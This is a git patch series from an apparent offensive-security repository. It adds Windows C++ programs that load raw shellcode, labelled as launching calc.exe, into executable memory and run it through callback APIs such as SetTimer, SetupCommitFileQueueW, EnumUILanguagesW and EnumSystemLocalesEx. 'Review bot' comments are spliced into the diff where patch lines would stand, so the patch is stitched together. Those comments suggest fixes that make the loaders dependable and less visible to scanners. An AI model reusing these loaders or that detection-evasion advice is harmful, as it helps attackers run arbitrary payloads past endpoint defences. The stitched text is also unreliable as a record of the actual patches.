@@ -291,6 +293,14 @@ Global {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x64.Build.0 = Release|x64 {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.ActiveCfg = Release|Win32 {8F7C78F7-1CE5-41F8-BAA7-92B297248DB4}.Release|x86.Build.0 = Release|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x64.ActiveCfg = Debug|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x64.Build.0 = Debug|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x86.ActiveCfg = Debug|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Debug|x86.Build.0 = Debug|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.ActiveCfg = Release|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.Build.0 = Release|x64 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.ActiveCfg = Release|Win32 + {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SetTimer/SetTimer.cpp b/SetTimer/SetTimer.cpp new file mode 100644 index 0000000..e193044 --- /dev/null +++ b/SetTimer/SetTimer.cpp 
@@ -0,0 +1,47 @@
+#include
+#include
+
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ UINT_PTR dummy = 0;
+ MSG msg;
+
+ ::SetTimer(NULL, dummy, NULL, (TIMERPROC)address);
+
+ ::GetMessageW(&msg, NULL, 0, 0);
+ ::TranslateMessage(&msg);
+ ::DispatchMessageW(&msg);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/SetTimer/SetTimer.vcxproj b/SetTimer/SetTimer.vcxproj
new file mode 100644
index 0000000..e3df7f4
--- /dev/null
+++ b/SetTimer/SetTimer.vcxproj
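Review bot: A single `GetMessageW` is only enough if WM_TIMER is the first message the thread retrieves; should anything else arrive first the callback never runs and `main` falls through to `return 0`, so pump until the timer has been dispatched, `while (::GetMessageW(&msg, NULL, 0, 0) > 0) { ::DispatchMessageW(&msg); if (msg.message == WM_TIMER) break; }` (the break keeps the loop bounded if a payload ever returns instead of exiting the process). SetTimer returns 0 on failure and that value is thrown away, while `NULL` is passed for the integer `uElapse` (it is just 0, which SetTimer raises to its minimum interval); `UINT_PTR id = ::SetTimer(NULL, 0, 10, (TIMERPROC)address); if (id == 0) return 1;` states the interval honestly and makes a failed registration visible. `VirtualAlloc` is likewise unchecked before the `memcpy`, which dereferences NULL on an allocation failure.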
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {b014bcb9-7850-4ac7-bd7f-6b07db77de35} + SetTimer + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SetTimer/SetTimer.vcxproj.filters b/SetTimer/SetTimer.vcxproj.filters new file mode 100644 index 0000000..2b550aa --- /dev/null +++ b/SetTimer/SetTimer.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From ba37bcf79677a2455ccdc6f52d20348dac3be4f6 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 1 Apr 2021 17:04:51 -0400 Subject: [PATCH 12/28] removed unecessary command --- SetTimer/SetTimer.cpp | 1 - 1 file changed, 1 deletion(-) diff --git a/SetTimer/SetTimer.cpp b/SetTimer/SetTimer.cpp index e193044..ec7cdc4 100644 --- a/SetTimer/SetTimer.cpp +++ b/SetTimer/SetTimer.cpp 
@@ -39,7 +39,6 @@ int main() { ::SetTimer(NULL, dummy, NULL, (TIMERPROC)address); ::GetMessageW(&msg, NULL, 0, 0); - ::TranslateMessage(&msg); ::DispatchMessageW(&msg); return 0; From e78103606470df4675b063cc3073c76eb676c36b Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 4 Apr 2021 11:26:22 -0400 Subject: [PATCH 13/28] Added SetupCommitFileQueueW --- AlternativeShellcodeExec.sln | 10 ++ .../SetupCommitFileQueueW.cpp | 46 ++++++ .../SetupCommitFileQueueW.vcxproj | 147 ++++++++++++++++++ .../SetupCommitFileQueueW.vcxproj.filters | 22 +++ 4 files changed, 225 insertions(+) create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.cpp create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index c4a9398..1fcbbbb 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -61,6 +61,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTimer.vcxproj", "{B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "SetupCommitFileQueueW\SetupCommitFileQueueW.vcxproj", "{86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -301,6 +303,14 @@ Global {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.Build.0 = Release|x64 {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.ActiveCfg = Release|Win32 {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.Build.0 = Release|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x64.ActiveCfg = Debug|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x64.Build.0 = Debug|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x86.ActiveCfg = Debug|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x86.Build.0 = Debug|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.ActiveCfg = Release|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.Build.0 = Release|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.ActiveCfg = Release|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp b/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp new file mode 100644 index 0000000..0445cbb --- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp 
@@ -0,0 +1,46 @@
+#include
+#include
+
+#include
+#pragma comment(lib, "Setupapi.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ HSPFILEQ hQueue = ::SetupOpenFileQueue();
+ ::SetupQueueCopyW(hQueue, L"c:\\", L"\\windows\\sytem32\\", L"kernel32.dll", NULL, NULL, L"c:\\windows\\temp\\", L"kernel32.dll", SP_COPY_NOSKIP);
+ ::SetupCommitFileQueueW(::GetTopWindow(NULL), hQueue, (PSP_FILE_CALLBACK_W)address, NULL);
+
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj
new file mode 100644
index 0000000..9a1f328
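Review bot: The source directory passed to `SetupQueueCopyW` is misspelled, `L"\\windows\\sytem32\\"`, so the queued operation describes a file that does not exist; the payload presumably still runs because the callback is invoked for the queue-start notification before any copy is attempted, but the string should read `L"\\windows\\system32\\"` so the queue is a plausible one. `SetupOpenFileQueue` returns INVALID_HANDLE_VALUE on failure and that is never tested, and the handle is never released with `::SetupCloseFileQueue(hQueue)`, which matters the moment a payload returns instead of exiting the process. `VirtualAlloc` is also unchecked before the `memcpy`. The target `c:\\windows\\temp\\` may not be writable for an unelevated tester, which is worth a comment on the call given that the copy result is never checked either.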
--- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {86e9bec1-c77a-449c-9d89-4e1aba9dfb0f} + SetupCommitFileQueueW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters new file mode 100644 index 0000000..3b9837a --- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 65170249c1d6e929af8fe80964ea3c380dce03d8 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Thu, 8 Apr 2021 17:20:16 -0400 Subject: [PATCH 14/28] Added EnumUILanguagesW --- AlternativeShellcodeExec.sln | 10 ++ EnumUILanguagesW/EnumUILanguagesW.cpp | 38 +++++ EnumUILanguagesW/EnumUILanguagesW.vcxproj | 147 ++++++++++++++++++ .../EnumUILanguagesW.vcxproj.filters | 22 +++ 4 files changed, 217 insertions(+) create mode 100644 EnumUILanguagesW/EnumUILanguagesW.cpp create mode 100644 EnumUILanguagesW/EnumUILanguagesW.vcxproj create mode 100644 EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 1fcbbbb..05088b7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -63,6 +63,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTim EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "SetupCommitFileQueueW\SetupCommitFileQueueW.vcxproj", "{86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUILanguagesW\EnumUILanguagesW.vcxproj", "{F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -311,6 +313,14 @@ Global {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.Build.0 = Release|x64 {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.ActiveCfg = Release|Win32 {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.Build.0 = Release|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x64.ActiveCfg = Debug|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x64.Build.0 = Debug|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x86.ActiveCfg = Debug|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x86.Build.0 = Debug|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.ActiveCfg = Release|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.Build.0 = Release|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.ActiveCfg = Release|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumUILanguagesW/EnumUILanguagesW.cpp b/EnumUILanguagesW/EnumUILanguagesW.cpp new file mode 100644 index 0000000..7b1b6b2 --- /dev/null +++ b/EnumUILanguagesW/EnumUILanguagesW.cpp 
@@ -0,0 +1,38 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ ::EnumUILanguagesW((UILANGUAGE_ENUMPROCW)address, MUI_LANGUAGE_ID, NULL);
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumUILanguagesW/EnumUILanguagesW.vcxproj b/EnumUILanguagesW/EnumUILanguagesW.vcxproj
new file mode 100644
index 0000000..69ca974
--- /dev/null
+++ b/EnumUILanguagesW/EnumUILanguagesW.vcxproj
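Review bot: The result of `EnumUILanguagesW` is dropped, so a failing call (it returns FALSE) and a call whose callback executed the payload both end in `return 0`, which makes this PoC useless as a yes/no test on a hardened host; `if (!::EnumUILanguagesW((UILANGUAGE_ENUMPROCW)address, MUI_LANGUAGE_ID, NULL)) return 1;` fixes that. `VirtualAlloc` is also unchecked before the `memcpy`; `if (address == NULL) return 1;` belongs between them. The page is RWX for its whole lifetime, and splitting that into a `PAGE_READWRITE` allocation followed by a `VirtualProtect` to `PAGE_EXECUTE_READ` after the copy would be worth doing consistently across the series, since the RWX private region is the part of this loader a scanner flags first.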
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {f9ebc138-ceba-4927-b9c2-ab6b751ab89e} + EnumUILanguagesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters b/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters new file mode 100644 index 0000000..b9cc20a --- /dev/null +++ b/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From bfa2913c26671765134423fd4e0d13befb920bc2 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Fri, 9 Apr 2021 17:01:46 -0400 Subject: [PATCH 15/28] Just keep on truckin --- AlternativeShellcodeExec.sln | 10 ++ EnumSystemLocales/EnumSystemLocales.cpp | 38 +++++ EnumSystemLocales/EnumSystemLocales.vcxproj | 147 ++++++++++++++++++ .../EnumSystemLocales.vcxproj.filters | 22 +++ 4 files changed, 217 insertions(+) create mode 100644 EnumSystemLocales/EnumSystemLocales.cpp create mode 100644 EnumSystemLocales/EnumSystemLocales.vcxproj create mode 100644 EnumSystemLocales/EnumSystemLocales.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 05088b7..fd9be1c 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -65,6 +65,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "Se EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUILanguagesW\EnumUILanguagesW.vcxproj", "{F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSystemLocales\EnumSystemLocales.vcxproj", "{C9CDA752-24AF-48CC-9F54-A695A453A929}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -321,6 +323,14 @@ Global {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.Build.0 = Release|x64 {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.ActiveCfg = Release|Win32 {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.Build.0 = Release|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x64.ActiveCfg = Debug|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x64.Build.0 = Debug|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x86.ActiveCfg = Debug|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x86.Build.0 = Debug|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.ActiveCfg = Release|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.Build.0 = Release|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.ActiveCfg = Release|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumSystemLocales/EnumSystemLocales.cpp b/EnumSystemLocales/EnumSystemLocales.cpp new file mode 100644 index 0000000..d3dff09 --- /dev/null +++ b/EnumSystemLocales/EnumSystemLocales.cpp 
@@ -0,0 +1,38 @@
+#include
+#include
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ ::EnumSystemLocalesEx((LOCALE_ENUMPROCEX)address, LOCALE_ALL, NULL, NULL);
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumSystemLocales/EnumSystemLocales.vcxproj b/EnumSystemLocales/EnumSystemLocales.vcxproj
new file mode 100644
index 0000000..e363f82
--- /dev/null
+++ b/EnumSystemLocales/EnumSystemLocales.vcxproj
